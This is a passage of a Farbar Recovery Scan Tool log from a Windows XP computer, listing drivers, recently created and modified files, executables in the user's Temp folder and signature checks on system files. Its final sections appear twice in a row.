R3 IntcAzAudAddService; C:\WINDOWS\System32\drivers\RtDHDAud.sys [5876224 2009-10-23] (Realtek Semiconductor Corp.)
R3 k57w2k; C:\WINDOWS\System32\DRIVERS\k57xp32.sys [209960 2009-05-31] (Broadcom Corporation)
R3 LEqdUsb; C:\WINDOWS\System32\Drivers\LEqdUsb.Sys [42264 2013-05-22] (Logitech, Inc.)
R3 LHidEqd; C:\WINDOWS\System32\Drivers\LHidEqd.Sys [10136 2013-05-22] (Logitech, Inc.)
S3 libusb0; C:\WINDOWS\System32\DRIVERS\libusb0.sys [42592 2013-08-30] (hxxp://libusb-win32.sourceforge.net)
S3 LVUSBSta; C:\WINDOWS\System32\DRIVERS\LVUSBSta.sys [41888 2007-05-11] (Logitech Inc.)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation)
S3 NuidFltr; C:\WINDOWS\System32\DRIVERS\NuidFltr.sys [14736 2009-05-09] (Microsoft Corporation)
S0 cerc6; no ImagePath
S4 IntelIde; no ImagePath
U1 WS2IFSL; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-11-14 20:31 - 2015-11-14 20:32 - 00000000 ____D C:\FRST
2015-11-14 14:55 - 2015-11-14 14:56 - 00000000 ___HD C:\bb64b446
2015-11-11 11:51 - 2015-11-14 20:32 - 00000664 _____ C:\Documents and Settings\Geny\Local Settings\Application Data\d3d9caps.dat
2015-11-04 19:16 - 2015-11-06 18:36 - 00000000 ____D C:\Program Files\Mozilla Firefox
2015-11-03 06:47 - 2015-11-03 06:47 - 00000000 ____D C:\Documents and Settings\Geny\Application Data\AVG
2015-11-03 06:45 - 2015-11-03 06:45 - 00000673 _____ C:\Documents and Settings\All Users\Desktop\AVG Protection.lnk
2015-11-03 06:40 - 2015-11-03 06:43 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Avg
2015-11-03 06:39 - 2015-11-03 06:40 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\AvgSetupLog
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-11-14 20:33 - 2010-03-30 13:51 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Temp
2015-11-14 20:32 - 2010-08-29 06:33 - 00000974 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1454471165-790525478-1801674531-1003UA.job
2015-11-14 20:24 - 2012-07-26 18:32 - 00000000 ____D C:\Documents and Settings\Geny\Application Data\uTorrent
2015-11-14 20:20 - 2010-03-30 13:46 - 01585423 _____ C:\WINDOWS\WindowsUpdate.log
2015-11-14 20:16 - 2010-03-30 06:32 - 00607774 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-11-14 20:12 - 2010-11-07 08:24 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-11-14 20:12 - 2010-03-30 06:34 - 00000159 _____ C:\WINDOWS\wiadebug.log
2015-11-14 20:12 - 2010-03-30 06:34 - 00000050 _____ C:\WINDOWS\wiaservc.log
2015-11-14 20:11 - 2014-04-09 02:24 - 00000220 _____ C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job
2015-11-14 20:11 - 2010-03-30 13:50 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-11-14 19:56 - 2012-07-26 18:27 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\MFAData
2015-11-14 19:53 - 2010-11-07 08:24 - 00000886 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-11-14 18:51 - 2010-03-30 15:12 - 00393216 _____ C:\WINDOWS\system32\config\WindowsPowerShell.evt
2015-11-14 11:53 - 2010-03-30 13:50 - 00032476 _____ C:\WINDOWS\SchedLgU.Txt
2015-11-14 07:51 - 2008-04-14 05:00 - 00002206 _____ C:\WINDOWS\system32\wpa.dbl
2015-11-12 22:03 - 2010-03-30 13:51 - 00000178 ___SH C:\Documents and Settings\Geny\ntuser.ini
2015-11-12 06:32 - 2010-08-29 06:33 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1454471165-790525478-1801674531-1003Core.job
2015-11-11 14:38 - 2015-06-02 07:46 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Avg
2015-11-11 12:56 - 2015-05-02 06:29 - 00001813 _____ C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
2015-11-11 10:59 - 2015-09-24 11:16 - 00000000 ___HD C:\Documents and Settings\All Users\Application Data\{42793930-2684-4C15-9B87-9CEF8846A875}
2015-11-11 10:35 - 2010-04-06 19:30 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Apple
2015-11-09 08:06 - 2010-03-30 13:51 - 00000000 ____D C:\Documents and Settings\Geny
2015-11-08 15:00 - 2014-04-09 02:24 - 00000214 _____ C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job
2015-11-08 03:15 - 2012-05-05 10:23 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2015-11-03 06:47 - 2012-07-26 18:55 - 00000000 ____D C:\Program Files\AVG
2015-11-03 06:46 - 2014-03-31 08:20 - 00000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\AVG
2015-11-03 06:45 - 2013-10-10 02:09 - 00219030 _____ C:\WINDOWS\setupapi.log
2015-10-29 17:40 - 2010-04-18 18:49 - 00148992 _____ C:\Documents and Settings\Geny\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-10-29 17:40 - 2010-04-17 16:41 - 00000069 _____ C:\WINDOWS\NeroDigital.ini
2015-10-28 16:15 - 2012-06-30 19:27 - 00780488 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2015-10-28 16:15 - 2011-06-03 19:23 - 00142536 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2015-10-28 16:15 - 2010-03-31 09:20 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Adobe
2015-10-21 16:24 - 2011-10-07 05:23 - 00229296 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgldx86.sys
2015-10-21 16:14 - 2011-08-08 05:08 - 00192944 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgmfx86.sys
2015-10-19 08:06 - 2014-06-17 15:17 - 00243632 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgidsdriverlx.sys
==================== Files in the root of some directories =======
2015-11-11 11:51 - 2015-11-14 20:32 - 0000664 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\d3d9caps.dat
2010-04-18 18:49 - 2015-10-29 17:40 - 0148992 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2012-11-11 08:07 - 2012-11-11 08:07 - 0027520 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\dt.dat
2011-01-04 14:30 - 2011-01-06 10:26 - 0001940 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini
Some files in TEMP:
====================
C:\Documents and Settings\Geny\Local Settings\Temp\11.exe
C:\Documents and Settings\Geny\Local Settings\Temp\avg-03e82148-59f7-4537-a3dc-287390295d3f.exe
C:\Documents and Settings\Geny\Local Settings\Temp\difxapi.dll
C:\Documents and Settings\Geny\Local Settings\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmprowbg4.dll
C:\Documents and Settings\Geny\Local Settings\Temp\en_ww_Package.exe
C:\Documents and Settings\Geny\Local Settings\Temp\FP_AX_MSI_INSTALLER.exe
C:\Documents and Settings\Geny\Local Settings\Temp\FP_PL_MSI_INSTALLER.exe
C:\Documents and Settings\Geny\Local Settings\Temp\GLF1B.tmp.tbZyng.dll
C:\Documents and Settings\Geny\Local Settings\Temp\hpzmsi01.exe
C:\Documents and Settings\Geny\Local Settings\Temp\hpzscr01.exe
C:\Documents and Settings\Geny\Local Settings\Temp\install_reader10_en_air_gtbp_mssa_aih[1].exe
C:\Documents and Settings\Geny\Local Settings\Temp\ose00000.exe
C:\Documents and Settings\Geny\Local Settings\Temp\TB_441.exe
C:\Documents and Settings\Geny\Local Settings\Temp\UNINSTALL.EXE
C:\Documents and Settings\Geny\Local Settings\Temp\utt8CF.tmp.exe
C:\Documents and Settings\Geny\Local Settings\Temp\Zynga.exe
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
==================== End of FRST.txt ============================
2015-10-28 16:15 - 2010-03-31 09:20 - 00000000 ____D C:\Documents and Settings\Geny\Local Settings\Application Data\Adobe
2015-10-21 16:24 - 2011-10-07 05:23 - 00229296 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgldx86.sys
2015-10-21 16:14 - 2011-08-08 05:08 - 00192944 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgmfx86.sys
2015-10-19 08:06 - 2014-06-17 15:17 - 00243632 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgidsdriverlx.sys
==================== Files in the root of some directories =======
2015-11-11 11:51 - 2015-11-14 20:32 - 0000664 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\d3d9caps.dat
2010-04-18 18:49 - 2015-10-29 17:40 - 0148992 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2012-11-11 08:07 - 2012-11-11 08:07 - 0027520 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\dt.dat
2011-01-04 14:30 - 2011-01-06 10:26 - 0001940 _____ () C:\Documents and Settings\Geny\Local Settings\Application Data\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini
Some files in TEMP:
====================
C:\Documents and Settings\Geny\Local Settings\Temp\11.exe
C:\Documents and Settings\Geny\Local Settings\Temp\avg-03e82148-59f7-4537-a3dc-287390295d3f.exe
C:\Documents and Settings\Geny\Local Settings\Temp\difxapi.dll
C:\Documents and Settings\Geny\Local Settings\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmprowbg4.dll
C:\Documents and Settings\Geny\Local Settings\Temp\en_ww_Package.exe
C:\Documents and Settings\Geny\Local Settings\Temp\FP_AX_MSI_INSTALLER.exe
C:\Documents and Settings\Geny\Local Settings\Temp\FP_PL_MSI_INSTALLER.exe
C:\Documents and Settings\Geny\Local Settings\Temp\GLF1B.tmp.tbZyng.dll
C:\Documents and Settings\Geny\Local Settings\Temp\hpzmsi01.exe
C:\Documents and Settings\Geny\Local Settings\Temp\hpzscr01.exe
C:\Documents and Settings\Geny\Local Settings\Temp\install_reader10_en_air_gtbp_mssa_aih[1].exe
C:\Documents and Settings\Geny\Local Settings\Temp\ose00000.exe
C:\Documents and Settings\Geny\Local Settings\Temp\TB_441.exe
C:\Documents and Settings\Geny\Local Settings\Temp\UNINSTALL.EXE
C:\Documents and Settings\Geny\Local Settings\Temp\utt8CF.tmp.exe
C:\Documents and Settings\Geny\Local Settings\Temp\Zynga.exe
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
==================== End of FRST.txt ============================